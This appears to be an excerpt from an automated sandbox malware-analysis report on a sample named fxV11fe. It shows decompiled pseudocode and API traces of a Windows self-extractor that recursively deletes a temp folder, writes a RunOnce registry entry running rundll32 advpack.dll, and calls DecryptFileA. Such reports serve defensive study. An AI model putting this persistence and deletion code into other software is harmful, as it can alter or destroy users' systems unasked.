                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 00A02F93
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00A02FB2
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00A02FC6
                                                                                                                                                                                                                                            • DecryptFileA.ADVAPI32 ref: 00A02FE6
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00A02FF8
                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00A0301C
                                                                                                                                                                                                                                              • Part of subcall function 00A051E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00A02F4D,?,00000002,00000000), ref: 00A05201
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                                                            • API String ID: 2126469477-3023407756
                                                                                                                                                                                                                                            • Opcode ID: 2e204b7eb60d2d478517f662926a6e4b2d99d2c25f1d7144da18554d2aa75420
                                                                                                                                                                                                                                            • Instruction ID: d363599ccc80d5b0661b090ba95ba78c0ff686d95b6f83c43f4a68fec405e46f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2e204b7eb60d2d478517f662926a6e4b2d99d2c25f1d7144da18554d2aa75420
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA41A272B0130D9ADF30EFB5BD4976A73ACAB58794F000165A941C25D2EB78CE83CA65
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                                            			E00A02390(CHAR* __ecx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v276;
                                                                                                                                                                                                                                            				char _v280;
                                                                                                                                                                                                                                            				char _v284;
                                                                                                                                                                                                                                            				struct _WIN32_FIND_DATAA _v596;
                                                                                                                                                                                                                                            				struct _WIN32_FIND_DATAA _v604;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t21;
                                                                                                                                                                                                                                            				int _t36;
                                                                                                                                                                                                                                            				void* _t46;
                                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                                            				void* _t63;
                                                                                                                                                                                                                                            				CHAR* _t65;
                                                                                                                                                                                                                                            				void* _t66;
                                                                                                                                                                                                                                            				signed int _t67;
                                                                                                                                                                                                                                            				signed int _t69;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                                                                                                                                                                                            				_t21 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				_t22 = _t21 ^ _t69;
                                                                                                                                                                                                                                            				_v8 = _t21 ^ _t69;
                                                                                                                                                                                                                                            				_t65 = __ecx;
                                                                                                                                                                                                                                            				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                                                                                                                                                                                            					L10:
                                                                                                                                                                                                                                            					_pop(_t62);
                                                                                                                                                                                                                                            					_pop(_t66);
                                                                                                                                                                                                                                            					_pop(_t46);
                                                                                                                                                                                                                                            					return E00A06CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					E00A01680( &_v276, 0x104, __ecx);
                                                                                                                                                                                                                                            					_t58 = 0x104;
                                                                                                                                                                                                                                            					E00A016B3( &_v280, 0x104, "*");
                                                                                                                                                                                                                                            					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                                                                                                                                                                                            					_t63 = _t22;
                                                                                                                                                                                                                                            					if(_t63 == 0xffffffff) {
                                                                                                                                                                                                                                            						goto L10;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						goto L3;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                            						L3:
                                                                                                                                                                                                                                            						_t58 = 0x104;
                                                                                                                                                                                                                                            						E00A01680( &_v276, 0x104, _t65);
                                                                                                                                                                                                                                            						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                                                                                                                                                                                            							_t58 = 0x104;
                                                                                                                                                                                                                                            							E00A016B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                                                                                                                                                                                            							SetFileAttributesA( &_v280, 0x80);
                                                                                                                                                                                                                                            							DeleteFileA( &_v280);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                                                                                                                                                                                            								E00A016B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                                                                                                                                                                                            								_t58 = 0x104;
                                                                                                                                                                                                                                            								E00A0658A( &_v280, 0x104, 0xa01140);
                                                                                                                                                                                                                                            								E00A02390( &_v284);
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                                                                                                                                                                                            					} while (_t36 != 0);
                                                                                                                                                                                                                                            					FindClose(_t63); // executed
                                                                                                                                                                                                                                            					_t22 = RemoveDirectoryA(_t65); // executed
                                                                                                                                                                                                                                            					goto L10;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}





















                                                                                                                                                                                                                                            0x00a02398
                                                                                                                                                                                                                                            0x00a0239e
                                                                                                                                                                                                                                            0x00a023a3
                                                                                                                                                                                                                                            0x00a023a5
                                                                                                                                                                                                                                            0x00a023ae
                                                                                                                                                                                                                                            0x00a023b3
                                                                                                                                                                                                                                            0x00a024cb
                                                                                                                                                                                                                                            0x00a024d2
                                                                                                                                                                                                                                            0x00a024d3
                                                                                                                                                                                                                                            0x00a024d4
                                                                                                                                                                                                                                            0x00a024df
                                                                                                                                                                                                                                            0x00a023c2
                                                                                                                                                                                                                                            0x00a023d1
                                                                                                                                                                                                                                            0x00a023db
                                                                                                                                                                                                                                            0x00a023e4
                                                                                                                                                                                                                                            0x00a023f6
                                                                                                                                                                                                                                            0x00a023fc
                                                                                                                                                                                                                                            0x00a02401
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a02407
                                                                                                                                                                                                                                            0x00a02407
                                                                                                                                                                                                                                            0x00a02408
                                                                                                                                                                                                                                            0x00a02411
                                                                                                                                                                                                                                            0x00a0241f
                                                                                                                                                                                                                                            0x00a0247a
                                                                                                                                                                                                                                            0x00a02483
                                                                                                                                                                                                                                            0x00a02495
                                                                                                                                                                                                                                            0x00a024a3
                                                                                                                                                                                                                                            0x00a02421
                                                                                                                                                                                                                                            0x00a0242f
                                                                                                                                                                                                                                            0x00a02453
                                                                                                                                                                                                                                            0x00a0245d
                                                                                                                                                                                                                                            0x00a02466
                                                                                                                                                                                                                                            0x00a02472
                                                                                                                                                                                                                                            0x00a02472
                                                                                                                                                                                                                                            0x00a0242f
                                                                                                                                                                                                                                            0x00a024af
                                                                                                                                                                                                                                            0x00a024b5
                                                                                                                                                                                                                                            0x00a024be
                                                                                                                                                                                                                                            0x00a024c5
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a024c5

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindFirstFileA.KERNELBASE(?,00A08A3A,00A011F4,00A08A3A,00000000,?,?), ref: 00A023F6
                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(?,00A011F8), ref: 00A02427
                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(?,00A011FC), ref: 00A0243B
                                                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00A02495
                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 00A024A3
                                                                                                                                                                                                                                            • FindNextFileA.KERNELBASE(00000000,00000010), ref: 00A024AF
                                                                                                                                                                                                                                            • FindClose.KERNELBASE(00000000), ref: 00A024BE
                                                                                                                                                                                                                                            • RemoveDirectoryA.KERNELBASE(00A08A3A), ref: 00A024C5
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 836429354-0
                                                                                                                                                                                                                                            • Opcode ID: 0f30a0ac0e9593af536d23c7c498f8f564f69335049fa9e6f597236d55512dfb
                                                                                                                                                                                                                                            • Instruction ID: f1397be2b35f8795ba3f0471b582359a833cad95bb1b380b9c0b9ecd7c5f3883
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0f30a0ac0e9593af536d23c7c498f8f564f69335049fa9e6f597236d55512dfb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7531723160474CABC320DFA4ED8DBEB73ACABD4305F04492DB555862D0EB75994E8792
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 70%
                                                                                                                                                                                                                                            			E00A02BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                                            				long _t4;
                                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                                            				intOrPtr _t7;
                                                                                                                                                                                                                                            				void* _t9;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t12;
                                                                                                                                                                                                                                            				intOrPtr* _t17;
                                                                                                                                                                                                                                            				signed char _t19;
                                                                                                                                                                                                                                            				intOrPtr* _t21;
                                                                                                                                                                                                                                            				void* _t22;
                                                                                                                                                                                                                                            				void* _t24;
                                                                                                                                                                                                                                            				intOrPtr _t32;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t4 = GetVersion();
                                                                                                                                                                                                                                            				if(_t4 >= 0 && _t4 >= 6) {
                                                                                                                                                                                                                                            					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                                                                                                                                                                                            					if(_t12 != 0) {
                                                                                                                                                                                                                                            						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                                                                                                                                                                                            						if(_t21 != 0) {
                                                                                                                                                                                                                                            							_t17 = _t21;
                                                                                                                                                                                                                                            							 *0xa0a288(0, 1, 0, 0);
                                                                                                                                                                                                                                            							 *_t21();
                                                                                                                                                                                                                                            							_t29 = _t24 - _t24;
                                                                                                                                                                                                                                            							if(_t24 != _t24) {
                                                                                                                                                                                                                                            								_t17 = 4;
                                                                                                                                                                                                                                            								asm("int 0x29");
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t20 = _a12;
                                                                                                                                                                                                                                            				_t18 = _a4;
                                                                                                                                                                                                                                            				 *0xa09124 = 0;
                                                                                                                                                                                                                                            				if(E00A02CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                                                                                                                                                                                            					_t9 = E00A02F1D(_t18, _t20); // executed
                                                                                                                                                                                                                                            					_t22 = _t9; // executed
                                                                                                                                                                                                                                            					E00A052B6(0, _t18, _t21, _t22); // executed
                                                                                                                                                                                                                                            					if(_t22 != 0) {
                                                                                                                                                                                                                                            						_t32 =  *0xa08a3a; // 0x0
                                                                                                                                                                                                                                            						if(_t32 == 0) {
                                                                                                                                                                                                                                            							_t19 =  *0xa09a2c; // 0x0
                                                                                                                                                                                                                                            							if((_t19 & 0x00000001) != 0) {
                                                                                                                                                                                                                                            								E00A01F90(_t19, _t21, _t22);
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t6 =  *0xa08588; // 0x0
                                                                                                                                                                                                                                            				if(_t6 != 0) {
                                                                                                                                                                                                                                            					CloseHandle(_t6);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t7 =  *0xa09124; // 0x80070002
                                                                                                                                                                                                                                            				return _t7;
                                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                                            0x00a02c03
                                                                                                                                                                                                                                            0x00a02c0d
                                                                                                                                                                                                                                            0x00a02c18
                                                                                                                                                                                                                                            0x00a02c20
                                                                                                                                                                                                                                            0x00a02c2e
                                                                                                                                                                                                                                            0x00a02c32
                                                                                                                                                                                                                                            0x00a02c36
                                                                                                                                                                                                                                            0x00a02c3d
                                                                                                                                                                                                                                            0x00a02c43
                                                                                                                                                                                                                                            0x00a02c45
                                                                                                                                                                                                                                            0x00a02c47
                                                                                                                                                                                                                                            0x00a02c49
                                                                                                                                                                                                                                            0x00a02c4e
                                                                                                                                                                                                                                            0x00a02c4e
                                                                                                                                                                                                                                            0x00a02c47
                                                                                                                                                                                                                                            0x00a02c32
                                                                                                                                                                                                                                            0x00a02c20
                                                                                                                                                                                                                                            0x00a02c50
                                                                                                                                                                                                                                            0x00a02c54
                                                                                                                                                                                                                                            0x00a02c57
                                                                                                                                                                                                                                            0x00a02c64
                                                                                                                                                                                                                                            0x00a02c66
                                                                                                                                                                                                                                            0x00a02c6b
                                                                                                                                                                                                                                            0x00a02c6d
                                                                                                                                                                                                                                            0x00a02c74
                                                                                                                                                                                                                                            0x00a02c76
                                                                                                                                                                                                                                            0x00a02c7c
                                                                                                                                                                                                                                            0x00a02c7e
                                                                                                                                                                                                                                            0x00a02c87
                                                                                                                                                                                                                                            0x00a02c89
                                                                                                                                                                                                                                            0x00a02c89
                                                                                                                                                                                                                                            0x00a02c87
                                                                                                                                                                                                                                            0x00a02c7c
                                                                                                                                                                                                                                            0x00a02c74
                                                                                                                                                                                                                                            0x00a02c8e
                                                                                                                                                                                                                                            0x00a02c95
                                                                                                                                                                                                                                            0x00a02c98
                                                                                                                                                                                                                                            0x00a02c98
                                                                                                                                                                                                                                            0x00a02c9e
                                                                                                                                                                                                                                            0x00a02ca7

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetVersion.KERNEL32(?,00000002,00000000,?,00A06BB0,00A00000,00000000,00000002,0000000A), ref: 00A02C03
                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00A06BB0,00A00000,00000000,00000002,0000000A), ref: 00A02C18
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00A02C28
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00A06BB0,00A00000,00000000,00000002,0000000A), ref: 00A02C98
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                                                            • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                                                            • API String ID: 62482547-3460614246
                                                                                                                                                                                                                                            • Opcode ID: 19a3638bf38c2a71754845cd280336f653de157f91530ccd8b00a66801b72578
                                                                                                                                                                                                                                            • Instruction ID: aecc8a047dcff85e72b58a4b78f6118dd0a671a2f6c79850d7f2dc44e00960ae
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 19a3638bf38c2a71754845cd280336f653de157f91530ccd8b00a66801b72578
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3511CE3170031EABE720ABF5BD8CBAF3769AB88391B044125F941E32E1DA30DC438765
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A06F40() {
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				SetUnhandledExceptionFilter(E00A06EF0); // executed
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}



                                                                                                                                                                                                                                            0x00a06f45
                                                                                                                                                                                                                                            0x00a06f4d

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00A06F45
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                                                                                                                            • Opcode ID: e6f5d7458d92b6466dd517de2edbeb0dca5da6e5632f0a15adefd7dd547d6544
                                                                                                                                                                                                                                            • Instruction ID: 2eaf7aee03360523b9e6ec1280c4dda2be5a915a46095f02a3bb6753f6bfa6c9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e6f5d7458d92b6466dd517de2edbeb0dca5da6e5632f0a15adefd7dd547d6544
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9590027425130857D6105BB0ED5941975A16B5D706B815960A011C44D5DB6040625552
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                            			E00A0202A(struct HINSTANCE__* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				char _v528;
                                                                                                                                                                                                                                            				void* _v532;
                                                                                                                                                                                                                                            				int _v536;
                                                                                                                                                                                                                                            				int _v540;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t28;
                                                                                                                                                                                                                                            				long _t36;
                                                                                                                                                                                                                                            				long _t41;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t46;
                                                                                                                                                                                                                                            				intOrPtr _t49;
                                                                                                                                                                                                                                            				intOrPtr _t50;
                                                                                                                                                                                                                                            				CHAR* _t54;
                                                                                                                                                                                                                                            				void _t56;
                                                                                                                                                                                                                                            				signed int _t66;
                                                                                                                                                                                                                                            				intOrPtr* _t72;
                                                                                                                                                                                                                                            				void* _t73;
                                                                                                                                                                                                                                            				void* _t75;
                                                                                                                                                                                                                                            				void* _t80;
                                                                                                                                                                                                                                            				intOrPtr* _t81;
                                                                                                                                                                                                                                            				void* _t86;
                                                                                                                                                                                                                                            				void* _t87;
                                                                                                                                                                                                                                            				void* _t90;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t91;
                                                                                                                                                                                                                                            				signed int _t93;
                                                                                                                                                                                                                                            				void* _t94;
                                                                                                                                                                                                                                            				void* _t95;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t79 = __edx;
                                                                                                                                                                                                                                            				_t28 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				_v8 = _t28 ^ _t93;
                                                                                                                                                                                                                                            				_t84 = 0x104;
                                                                                                                                                                                                                                            				memset( &_v268, 0, 0x104);
                                                                                                                                                                                                                                            				memset( &_v528, 0, 0x104);
                                                                                                                                                                                                                                            				_t95 = _t94 + 0x18;
                                                                                                                                                                                                                                            				_t66 = 0;
                                                                                                                                                                                                                                            				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                                                                                                                                                                                            				if(_t36 != 0) {
                                                                                                                                                                                                                                            					L24:
                                                                                                                                                                                                                                            					return E00A06CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_push(_t86);
                                                                                                                                                                                                                                            				_t87 = 0;
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					E00A0171E("wextract_cleanup1", 0x50, "wextract_cleanup%d", _t87);
                                                                                                                                                                                                                                            					_t95 = _t95 + 0x10;
                                                                                                                                                                                                                                            					_t41 = RegQueryValueExA(_v532, "wextract_cleanup1", 0, 0, 0,  &_v540); // executed
                                                                                                                                                                                                                                            					if(_t41 != 0) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t87 = _t87 + 1;
                                                                                                                                                                                                                                            					if(_t87 < 0xc8) {
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					break;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t87 != 0xc8) {
                                                                                                                                                                                                                                            					GetSystemDirectoryA( &_v528, _t84);
                                                                                                                                                                                                                                            					_t79 = _t84;
                                                                                                                                                                                                                                            					E00A0658A( &_v528, _t84, "advpack.dll");
                                                                                                                                                                                                                                            					_t46 = LoadLibraryA( &_v528); // executed
                                                                                                                                                                                                                                            					_t84 = _t46;
                                                                                                                                                                                                                                            					if(_t84 == 0) {
                                                                                                                                                                                                                                            						L10:
                                                                                                                                                                                                                                            						if(GetModuleFileNameA( *0xa09a3c,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                            							L17:
                                                                                                                                                                                                                                            							_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                                                            							L23:
                                                                                                                                                                                                                                            							_pop(_t86);
                                                                                                                                                                                                                                            							goto L24;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						L11:
                                                                                                                                                                                                                                            						_t72 =  &_v268;
                                                                                                                                                                                                                                            						_t80 = _t72 + 1;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t49 =  *_t72;
                                                                                                                                                                                                                                            							_t72 = _t72 + 1;
                                                                                                                                                                                                                                            						} while (_t49 != 0);
                                                                                                                                                                                                                                            						_t73 = _t72 - _t80;
                                                                                                                                                                                                                                            						_t81 = 0xa091e4;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t50 =  *_t81;
                                                                                                                                                                                                                                            							_t81 = _t81 + 1;
                                                                                                                                                                                                                                            						} while (_t50 != 0);
                                                                                                                                                                                                                                            						_t84 = _t73 + 0x50 + _t81 - 0xa091e5;
                                                                                                                                                                                                                                            						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0xa091e5);
                                                                                                                                                                                                                                            						if(_t90 != 0) {
                                                                                                                                                                                                                                            							 *0xa08580 = _t66 ^ 0x00000001;
                                                                                                                                                                                                                                            							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                                                                                                                                                                                            							if(_t66 == 0) {
                                                                                                                                                                                                                                            								_t54 = "%s /D:%s";
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_push("C:\Users\jones\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                                                            							E00A0171E(_t90, _t84, _t54,  &_v268);
                                                                                                                                                                                                                                            							_t75 = _t90;
                                                                                                                                                                                                                                            							_t23 = _t75 + 1; // 0x1
                                                                                                                                                                                                                                            							_t79 = _t23;
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								_t56 =  *_t75;
                                                                                                                                                                                                                                            								_t75 = _t75 + 1;
                                                                                                                                                                                                                                            							} while (_t56 != 0);
                                                                                                                                                                                                                                            							_t24 = _t75 - _t79 + 1; // 0x2
                                                                                                                                                                                                                                            							RegSetValueExA(_v532, "wextract_cleanup1", 0, 1, _t90, _t24); // executed
                                                                                                                                                                                                                                            							RegCloseKey(_v532); // executed
                                                                                                                                                                                                                                            							_t36 = LocalFree(_t90);
                                                                                                                                                                                                                                            							goto L23;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t79 = 0x4b5;
                                                                                                                                                                                                                                            						E00A044B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                                                                                                                                                                                            						goto L17;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                                                                                                                                                                                            					_t66 = 0 | _t91 != 0x00000000;
                                                                                                                                                                                                                                            					FreeLibrary(_t84); // executed
                                                                                                                                                                                                                                            					if(_t91 == 0) {
                                                                                                                                                                                                                                            						goto L10;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                            						E00A0658A( &_v268, 0x104, 0xa01140);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                                                            				 *0xa08530 = _t66;
                                                                                                                                                                                                                                            				goto L23;
                                                                                                                                                                                                                                            			}

































                                                                                                                                                                                                                                            0x00a0202a
                                                                                                                                                                                                                                            0x00a02035
                                                                                                                                                                                                                                            0x00a0203c
                                                                                                                                                                                                                                            0x00a02041
                                                                                                                                                                                                                                            0x00a02050
                                                                                                                                                                                                                                            0x00a0205f
                                                                                                                                                                                                                                            0x00a02064
                                                                                                                                                                                                                                            0x00a0206f
                                                                                                                                                                                                                                            0x00a0208c
                                                                                                                                                                                                                                            0x00a02094
                                                                                                                                                                                                                                            0x00a02257
                                                                                                                                                                                                                                            0x00a02266
                                                                                                                                                                                                                                            0x00a02266
                                                                                                                                                                                                                                            0x00a0209a
                                                                                                                                                                                                                                            0x00a0209b
                                                                                                                                                                                                                                            0x00a0209d
                                                                                                                                                                                                                                            0x00a020aa
                                                                                                                                                                                                                                            0x00a020af
